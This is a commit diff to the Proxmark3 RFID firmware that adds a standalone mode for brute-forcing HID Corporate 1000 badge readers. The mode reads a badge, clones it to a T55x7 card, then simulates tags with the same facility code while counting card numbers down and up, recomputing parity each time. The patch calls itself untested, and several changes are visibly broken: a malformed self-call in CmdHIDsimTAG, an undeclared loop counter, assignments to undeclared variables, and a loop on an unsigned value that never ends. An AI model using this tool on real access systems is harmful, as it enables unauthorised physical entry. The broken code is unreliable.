ADD: standalone mode : LF HID corporate 1000 bruteforce by @federicodotta et al.

https://github.com/federicodotta/proxmark3

--adjusted to fit iceman fork and latest enhancements to LF
(untested)

FIX:  some calls to deviceside demods, use 0 instead of reference.
ADD:  timeout after n cycles of simulating

armsrc/Makefile

@@ -35,7 +35,7 @@ APP_CFLAGS = -DWITH_CRC \
 #			 -DWITH_LF_ICERUN
 #			 -DWITH_LF_SAMYRUN
 #			 -DWITH_LF_PROXBRUTE
-#			 -DWITH_LF_HIDCORP
+#			 -DWITH_LF_HIDBRUTE
 #			 -DWITH_HF_YOUNG
 #			 -DWITH_HF_MATTYRUN
 #			 -DWITH_HF_COLIN
@@ -44,7 +44,7 @@ APP_CFLAGS = -DWITH_CRC \
 SRC_LCD = fonts.c LCD.c
 SRC_LF = lfops.c hitag2.c hitagS.c lfsampling.c pcf7931.c lfdemod.c
 SRC_ISO15693 = iso15693.c iso15693tools.c
-SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c
+SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c mifaresim.c
 SRC_ISO14443b = iso14443b.c
 SRC_FELICA = felica.c
 SRC_CRAPTO1 = crypto1.c des.c aes.c desfire_key.c desfire_crypto.c mifaredesfire.c
@@ -101,6 +101,7 @@ ARMSRC = fpgaloader.c \
 	cmd.c \
 	hf_young.c
 	#	lf_samyrun.c \
+	#	lf_hidbrute.c \
 	
 # Do not move this inclusion before the definition of {THUMB,ASM,ARM}SRC
 include ../common/Makefile.common

armsrc/Standalone/lf_hidbrute.c

@@ -0,0 +1,328 @@
+//-----------------------------------------------------------------------------
+// Samy Kamkar, 2012
+// Federico Dotta, 2015
+// Maurizio Agazzini, 2015
+// Christian Herrmann, 2017
+//
+// This code is licensed to you under the terms of the GNU GPL, version 2 or,
+// at your option, any later version. See the LICENSE.txt file for the text of
+// the license.
+//
+// PROXMARK3 - HID CORPORATE 1000 BRUTEFORCER (STAND-ALONE MODE)
+// 
+// This version of Proxmark3 firmware adds one extra stand-alone mode to proxmark3 firmware.
+// The new stand-alone mode allows to execute a bruteforce on HID Corporate 1000 readers, by
+// reading a specific badge and bruteforcing the Card Number (incrementing and decrementing it),
+// mainteining the same Facility Code of the original badge.
+//
+// Based on an idea of Brad Antoniewicz of McAfee® Foundstone® Professional Services (ProxBrute), 
+// the stand-alone mode has been rewritten in order to overcome some limitations of ProxBrute firmware,
+// that does not consider parity bits.
+//  
+// https://github.com/federicodotta/proxmark3
+//
+//-----------------------------------------------------------------------------------
+// main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini
+//-----------------------------------------------------------------------------------
+#include "lf_hidbrute.h"
+
+// samy's sniff and repeat routine for LF
+void RunMod() {
+	StandAloneMode();
+	FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
+
+	uint32_t high[OPTS], low[OPTS];
+	int selected = 0;
+	int playing = 0;
+	int cardRead = 0;
+
+	// Turn on selected LED
+	LED(selected + 1, 0);
+
+	for (;;) {		
+		WDT_HIT();
+		
+		// exit from SamyRun,   send a usbcommand.
+		if (usb_poll_validate_length()) break;
+
+		// Was our button held down or pressed?
+		int button_pressed = BUTTON_HELD(1000);
+		//SpinDelay(300);
+
+		// Button was held for a second, begin recording
+		if (button_pressed > 0 && cardRead == 0) {
+			LEDsoff();
+			LED(selected + 1, 0);
+			LED(LED_RED2, 0);
+
+			// record
+			DbpString("Starting recording");
+
+			// wait for button to be released
+			while(BUTTON_PRESS())
+				WDT_HIT();
+
+			/* need this delay to prevent catching some weird data */
+			SpinDelay(500);
+
+			CmdHIDdemodFSK(1, &high[selected], &low[selected], 0);
+			Dbprintf("Recorded %x %x %08x", selected, high[selected], low[selected]);
+
+			LEDsoff();
+			LED(selected + 1, 0);
+			// Finished recording
+			// If we were previously playing, set playing off
+			// so next button push begins playing what we recorded
+			playing = 0;			
+			cardRead = 1;	
+		}
+		else if (button_pressed > 0 && cardRead == 1) {
+			LEDsoff();
+			LED(selected + 1, 0);
+			LED(LED_ORANGE, 0);
+
+			// record
+			Dbprintf("Cloning %x %x %08x", selected, high[selected], low[selected]);
+
+			// wait for button to be released
+			while(BUTTON_PRESS())
+				WDT_HIT();
+
+			/* need this delay to prevent catching some weird data */
+			SpinDelay(500);
+
+			CopyHIDtoT55x7(0, high[selected], low[selected], 0);
+			Dbprintf("Cloned %x %x %08x", selected, high[selected], low[selected]);
+
+			LEDsoff();
+			LED(selected + 1, 0);
+			// Finished recording
+
+			// If we were previously playing, set playing off
+			// so next button push begins playing what we recorded
+			playing = 0;			
+			cardRead = 0;			
+		}
+
+		// Change where to record (or begin playing)
+		else if (button_pressed) {
+			// Next option if we were previously playing
+			if (playing)
+				selected = (selected + 1) % OPTS;
+			playing = !playing;
+
+			LEDsoff();
+			LED(selected + 1, 0);
+
+			// Begin transmitting
+			if (playing && selected != 2) {
+
+				LED(LED_GREEN, 0);
+				DbpString("Playing");
+				
+				// wait for button to be released
+				while (BUTTON_PRESS())
+					WDT_HIT();
+				
+				Dbprintf("%x %x %08x", selected, high[selected], low[selected]);
+				CmdHIDsimTAG(high[selected], low[selected], 0);		
+				DbpString("Done playing");
+				
+				if (BUTTON_HELD(1000) > 0) {
+					DbpString("Exiting");
+					LEDsoff();
+					return;
+				}
+
+				/* We pressed a button so ignore it here with a delay */
+				SpinDelay(300);
+
+				// when done, we're done playing, move to next option
+				selected = (selected + 1) % OPTS;
+				playing = !playing;
+				LEDsoff();
+				LED(selected + 1, 0);
+			}
+			else if (playing && selected == 2)
+			{
+				// Now it work only with HID Corporate 1000 (35bit), but is easily extensible to others RFID. 
+				// It is necessary only to calculate the correct parity. 
+				
+				// Brute force code
+				// Check if the badge is an HID Corporate 1000
+				if( (high[selected] & 0xFFFFFFF8) != 0x28 ) {
+					DbpString("Card is not a HID Corporate 1000. Skipping bruteforce.");
+					continue;
+				}
+
+				LED(LED_GREEN, 0);
+				DbpString("Entering bruteforce mode");
+				// wait for button to be released
+				while (BUTTON_PRESS())
+					WDT_HIT();
+				
+				// Calculate Facility Code and Card Number from high and low
+				uint32_t cardnum = (low[selected] >> 1) & 0xFFFFF;
+				uint32_t fc = ((high[selected] & 1 ) << 11 ) | (low[selected] >> 21);
+				uint32_t original_cardnum = cardnum;
+
+				Dbprintf("Proxbrute - starting decrementing card number");
+
+				while (cardnum >= 0) {
+				
+					// Needed for exiting from proxbrute when button is pressed
+					if (BUTTON_PRESS()) {
+						if (BUTTON_HELD(1000) > 0) {
+							DbpString("Exiting");
+							LEDsoff();
+							return;
+						} else {
+							while (BUTTON_PRESS()) { WDT_HIT();	}
+							break;
+						}
+					}
+
+					// Decrement Card Number
+					cardnum--;
+
+					// Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables
+					hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc);
+
+					// Print actual code to brute
+					Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum);
+			
+					CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000);
+				}
+
+				cardnum = original_cardnum;
+
+				Dbprintf("Proxbrute - starting incrementing card number");
+
+				while (cardnum <= 0xFFFFF) {
+					
+					// Needed for exiting from proxbrute when button is pressed
+					if (BUTTON_PRESS()) {
+						if (BUTTON_HELD(1000) > 0) {
+							DbpString("Exiting");
+							LEDsoff();
+							return;
+						} else {							
+							while (BUTTON_PRESS()) { WDT_HIT(); }
+							break;
+						}
+					}
+
+					// Decrement Card Number
+					cardnum++;
+
+					// Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables
+					hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc);
+
+					// Print actual code to brute
+					Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum);
+
+					CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000);
+				}
+
+				DbpString("Done brute");
+				if (BUTTON_HELD(1000) > 0)	{
+					DbpString("Exiting");
+					LEDsoff();
+					return;
+				}
+
+				/* We pressed a button so ignore it here with a delay */
+				SpinDelay(300);
+
+				// when done, we're done playing, move to next option
+				selected = (selected + 1) % OPTS;
+				playing = !playing;
+				LEDsoff();
+				LED(selected + 1, 0);
+				
+			} else {
+				while(BUTTON_PRESS())
+					WDT_HIT();
+			}
+		}
+	}
+}
+
+// Function that calculate next value for the brutforce of HID corporate 1000
+void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
+
+	uint32_t new_high = 0;
+	uint32_t new_low = 0;	
+
+	// Calculate new high and low base value from card number and facility code, without parity
+	new_low = (fc << 21) | (cardnum << 1); 
+	new_high = 0x28 | ((fc >> 11) & 1); // 0x28 is 101000
+
+	int n_ones;
+	uint32_t i;
+	
+	// Calculating and setting parity bit 34
+	// Select only bit used for parity bit 34 in low number (10110110110110110110110110110110)
+	uint32_t parity_bit_34_low = new_low & 0xB6DB6DB6;
+	n_ones = 0;
+	// Calculate number of ones in low number
+	for ( i = 1; i != 0; i <<= 1) {
+		if( parity_bit_34_low & i )
+			n_ones++;
+	}
+	// Calculate number of ones in high number
+	if (new_high & 1)
+		n_ones++;
+	
+	// Set parity bit (Even parity)
+	if (n_ones % 2)
+		new_high = new_high | 0x2;
+
+	// Calculating and setting parity bit 1
+	// Select only bit used for parity bit 1 in low number (01101101101101101101101101101100)
+	uint32_t parity_bit_1_low = new_low & 0x6DB6DB6C;
+	n_ones = 0;
+
+	// Calculate number of ones in low number
+	for ( i=1; i != 0; i <<= 1) {
+		if( parity_bit_1_low & i )
+			n_ones++;
+	}
+	// Calculate number of ones in high number
+	if ( new_high & 0x1)
+		n_ones++;
+	
+	if ( new_high & 0x2)
+		n_ones++;
+	
+	// Set parity bit (Odd parity)
+	if (!(n_ones % 2))
+		new_low = new_low | 0x1;
+	
+	// Calculating and setting parity bit 35
+	n_ones = 0;
+	// Calculate number of ones in low number (all bit of low, bitmask unnecessary)
+	for (i = 1; i != 0; i <<= 1) {
+		if ( new_low & i )
+			n_ones++;
+	}
+	// Calculate number of ones in high number
+	if ( new_high & 0x1)
+		n_ones++;
+	
+	if ( new_high & 0x2)
+		n_ones++;
+
+	// Set parity bit (Odd parity)
+	if (!(n_ones % 2))
+		new_high = new_high | 0x4;
+
+	// Setting new calculated values
+	*low = new_low;
+	*high = new_high;
+}
+
+// prepare a waveform pattern in the buffer based on the ID given then
+// simulate a HID tag until the button is pressed or after #numcycles cycles
+// Used to bruteforce HID in standalone mode.
+

armsrc/Standalone/lf_hidbrute.h

@@ -0,0 +1,23 @@
+//-----------------------------------------------------------------------------
+// Samy Kamkar 2012
+// Christian Herrmann, 2017
+//
+// This code is licensed to you under the terms of the GNU GPL, version 2 or,
+// at your option, any later version. See the LICENSE.txt file for the text of
+// the license.
+//-----------------------------------------------------------------------------
+// StandAlone Mod
+//-----------------------------------------------------------------------------
+
+#ifndef __LF_SAMYRUN_H
+#define __LF_SAMYRUN_H
+
+//#include <stdbool.h> // for bool
+#include "standalone.h" // standalone definitions
+#include "apps.h" // debugstatements, lfops?
+
+#define OPTS 3
+
+void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc);
+
+#endif /* __LF_SAMYRUN_H */

armsrc/appmain.c

@@ -392,8 +392,8 @@ void printStandAloneModes(void) {
 	#if defined(WITH_LF_PROXBRUTE)
 	DbpString("   LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
 	#endif 
-	#if defined(WITH_LF_HIDCORP)
+	#if defined(WITH_LF_HIDBRUTE)
-	DbpString("   LF HID corporate 1000 bruteforce - (Federi Codotta)");
+	DbpString("   LF HID corporate 1000 bruteforce - (Federico dotta & Maurizio Agazzini)");
 	#endif 
 	#if defined(WITH_HF_MATTYRUN)
 	DbpString("   HF Mifare sniff/clone - aka MattyRun (Matta Real)");
@@ -585,9 +585,11 @@ void UsbPacketReceived(uint8_t *packet, int len) {
 			cmd_send(CMD_ACK, bits, 0, 0, 0, 0);
 			break;
 		}
-		case CMD_HID_DEMOD_FSK:
+		case CMD_HID_DEMOD_FSK: {
-			CmdHIDdemodFSK(c->arg[0], 0, 0, 1);
+			uint32_t high, low;
+			CmdHIDdemodFSK(c->arg[0], &high, &low, 1);
 			break;
+		}
 		case CMD_HID_SIM_TAG:
 			CmdHIDsimTAG(c->arg[0], c->arg[1], 1);
 			break;
@@ -603,15 +605,19 @@ void UsbPacketReceived(uint8_t *packet, int len) {
 		case CMD_HID_CLONE_TAG:
 			CopyHIDtoT55x7(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]);
 			break;
-		case CMD_IO_DEMOD_FSK:
+		case CMD_IO_DEMOD_FSK: {
-			CmdIOdemodFSK(c->arg[0], 0, 0, 1);
+			uint32_t high, low;
+			CmdIOdemodFSK(c->arg[0], &high, &low, 1);
 			break;
+		}
 		case CMD_IO_CLONE_TAG:
 			CopyIOtoT55x7(c->arg[0], c->arg[1]);
 			break;
-		case CMD_EM410X_DEMOD:
+		case CMD_EM410X_DEMOD: {
-			CmdEM410xdemod(c->arg[0], 0, 0, 1);
+			uint32_t high, low;
+			CmdEM410xdemod(c->arg[0], &high, &low, 1);
 			break;
+		}
 		case CMD_EM410X_WRITE_TAG:
 			WriteEM410x(c->arg[0], c->arg[1], c->arg[2]);
 			break;
@@ -660,9 +666,12 @@ void UsbPacketReceived(uint8_t *packet, int len) {
 		case CMD_EM4X_WRITE_WORD:
 			EM4xWriteWord(c->arg[0], c->arg[1], c->arg[2]);
 			break;
-		case CMD_AWID_DEMOD_FSK: // Set realtime AWID demodulation
+		case CMD_AWID_DEMOD_FSK:  {
-			CmdAWIDdemodFSK(c->arg[0], 0, 0, 1);
+			uint32_t high, low;
+			// Set realtime AWID demodulation
+			CmdAWIDdemodFSK(c->arg[0], &high, &low, 1);
 			break;
+		}
         case CMD_VIKING_CLONE_TAG:
 			CopyVikingtoT55xx(c->arg[0], c->arg[1], c->arg[2]);
             break;
@@ -1195,13 +1204,14 @@ void  __attribute__((noreturn)) AppMain(void) {
 * All standalone mod "main loop" should be the RunMod() function.
 * Since the standalone is either LF or HF, the somewhat bisarr defines below exists. 
 */			
-#if defined (WITH_LF) && defined (WITH_LF_SAMYRUN)
+#if defined (WITH_LF) && ( defined (WITH_LF_SAMYRUN) || defined (WITH_LF_HIDBRUTE) )
 			RunMod();
 #endif
 		
 #if defined (WITH_ISO14443a) && defined (WITH_HF_YOUNG) 
 			RunMod();
 #endif
+
 			// when here,  we are no longer in standalone mode.
 			// reseting the variables which keeps track of usb re-attached/configured
 			//SetUSBreconnect(0);

armsrc/apps.h

@@ -79,16 +79,18 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc);
 
 void AcquireTiType(void);
 void AcquireRawBitsTI(void);
+void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles);
 void SimulateTagLowFrequency(int period, int gap, int ledcontrol);
 void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen);
-void CmdHIDsimTAG(int hi, int lo, int ledcontrol);
+void CmdHIDsimTAGEx(uint32_t hi, uint32_t lo, int ledcontrol, int numcycles);
+void CmdHIDsimTAG(uint32_t hi, uint32_t lo, int ledcontrol);
 void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream);
 void CmdASKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream);
 void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream);
-void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol);
+void CmdHIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol);
-void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol); // Realtime demodulation mode for AWID26
+void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); // Realtime demodulation mode for AWID26
-void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol);
+void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol);
-void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol);
+void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol);
 void CopyIOtoT55x7(uint32_t hi, uint32_t lo); // Clone an ioProx card to T5557/T5567
 void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT); // Clone an HID card to T5557/T5567
 void CopyVikingtoT55xx(uint32_t block1, uint32_t block2, uint8_t Q5);

armsrc/lfops.c

@@ -395,8 +395,7 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc)
 	StopTicks();
 }
 
-void SimulateTagLowFrequency(int period, int gap, int ledcontrol)
+void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles) {
-{
 	// note this may destroy the bigbuf so be sure this is called before now...
 	//FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
 	
@@ -404,7 +403,6 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol)
 	FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT);
 	SpinDelay(20);
 
-	#define BREAK_OUT_LIMIT 	
 	int i = 0;
 	uint8_t *buf = BigBuf_get_addr();
 	
@@ -424,6 +422,15 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol)
 
 	for(;;) {
 
+		if ( numcycles > -1 ) {
+			if ( x != numcycles ) {
+				++x;
+			} else { 
+				// exit without turning of field
+				return; 
+			}
+		}
+	
 		if (ledcontrol) LED_D_ON();
 				
 		// wait until SSC_CLK goes HIGH
@@ -461,9 +468,13 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol)
 OUT: 
 	FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
 	LED_D_OFF();
-	return;	
 }
 
+void SimulateTagLowFrequency(int period, int gap, int ledcontrol) {
+	SimulateTagLowFrequencyEx(period, gap, ledcontrol, -1);
+}
+
+
 #define DEBUG_FRAME_CONTENTS 1
 void SimulateTagLowFrequencyBidir(int divisor, int t0)
 {
@@ -563,7 +574,7 @@ static void fcAll(uint8_t fc, int *n, uint8_t clock, uint16_t *modCnt)
 
 // prepare a waveform pattern in the buffer based on the ID given then
 // simulate a HID tag until the button is pressed
-void CmdHIDsimTAG(int hi, int lo, int ledcontrol) {
+void CmdHIDsimTAGEx( uint32_t hi, uint32_t lo, int ledcontrol, int numcycles) {
 
 	if (hi > 0xFFF) {
 		DbpString("Tags can only have 44 bits. - USE lf simfsk for larger tags");
@@ -618,10 +629,14 @@ void CmdHIDsimTAG(int hi, int lo, int ledcontrol) {
 	}
 
 	if (ledcontrol)	LED_A_ON();
-	SimulateTagLowFrequency(n, 0, ledcontrol);
+	SimulateTagLowFrequencyEx(n, 0, ledcontrol, numcycles);
 	if (ledcontrol)	LED_A_OFF();
 }
 
+void CmdHIDsimTAG( uint32_t hi, uint32_t lo, int ledcontrol) {
+	void CmdHIDsimTAG( hi, lo, ledcontrol, -1)
+}
+
 // prepare a waveform pattern in the buffer based on the ID given then
 // simulate a FSK tag until the button is pressed
 // arg1 contains fcHigh and fcLow, arg2 contains STT marker and clock
@@ -800,12 +815,11 @@ void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream)
 }
 
 // loop to get raw HID waveform then FSK demodulate the TAG ID from it
-void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
+void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) {
-{
 	uint8_t *dest = BigBuf_get_addr();
 	size_t size = 0; 
-	uint32_t hi2=0, hi=0, lo=0;
+	uint32_t hi2 = 0, hi = 0, lo = 0;
-	int idx=0;
+	int idx = 0;
 	int dummyIdx = 0;
 	// Configure to go in 125Khz listen mode
 	LFSetupFPGAForADC(95, true);
@@ -813,7 +827,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
 	//clear read buffer
 	BigBuf_Clear_keep_EM();
 
-	while(!BUTTON_PRESS() && !usb_poll_validate_length()) {
+	while( !BUTTON_PRESS() && !usb_poll_validate_length()) {
 
 		WDT_HIT();
 		if (ledcontrol) LED_A_ON();
@@ -899,8 +913,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
 }
 
 // loop to get raw HID waveform then FSK demodulate the TAG ID from it
-void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
+void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) {
-{
 	uint8_t *dest = BigBuf_get_addr();
 	size_t size; 
 	int idx=0, dummyIdx=0;
@@ -978,6 +991,8 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
 		}
 		if (findone){
 			if (ledcontrol)	LED_A_OFF();
+			*high = hi;
+			*low = lo;
 			break;
 		}
 		// reset
@@ -989,8 +1004,7 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
 	if (ledcontrol) LED_A_OFF();
 }
 
-void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol)
+void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol) {
-{
 	uint8_t *dest = BigBuf_get_addr();
 
 	size_t size=0, idx=0;
@@ -1037,8 +1051,8 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol)
 
 			if (findone){
 				if (ledcontrol) LED_A_OFF();
-				*high=lo>>32;
+				*high = hi;
-				*low=lo & 0xFFFFFFFF;
+				*low = lo;
 				break;
 			}
 		}
@@ -1051,25 +1065,24 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol)
 	if (ledcontrol) LED_A_OFF();
 }
 
-void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol)
+void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) {
-{
 	uint8_t *dest = BigBuf_get_addr();
 	int dummyIdx = 0;
 	int idx = 0;
-	uint32_t code=0, code2=0;
+	uint32_t code = 0, code2 = 0;
-	uint8_t version=0;
+	uint8_t version = 0;
-	uint8_t facilitycode=0;
+	uint8_t facilitycode = 0;
-	uint16_t number=0;
+	uint16_t number = 0;
 	uint8_t crc = 0;
 	uint16_t calccrc = 0;
 	size_t size = BigBuf_max_traceLen();
-	//clear read buffer
+	
 	BigBuf_Clear_keep_EM();
 	
 	// Configure to go in 125Khz listen mode
 	LFSetupFPGAForADC(95, true);
 
-	while(!BUTTON_PRESS() && !usb_poll_validate_length()) {
+	while (!BUTTON_PRESS() && !usb_poll_validate_length()) {
 		WDT_HIT();
 		if (ledcontrol) LED_A_ON();
 		DoAcquisition_default(-1,true);
@@ -1124,14 +1137,14 @@ void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol)
 			// if we're only looking for one tag
 			if (findone){
 				if (ledcontrol)	LED_A_OFF();
-				*high=code;
+				*high = hi;
-				*low=code2;
+				*low = lo;
 				break;
 			}
-			code=code2=0;
+			code = code2 = 0;
-			version=facilitycode=0;
+			version = facilitycode = 0;
-			number=0;
+			number = 0;
-			idx=0;
+			idx = 0;
 
 		WDT_HIT();
 	}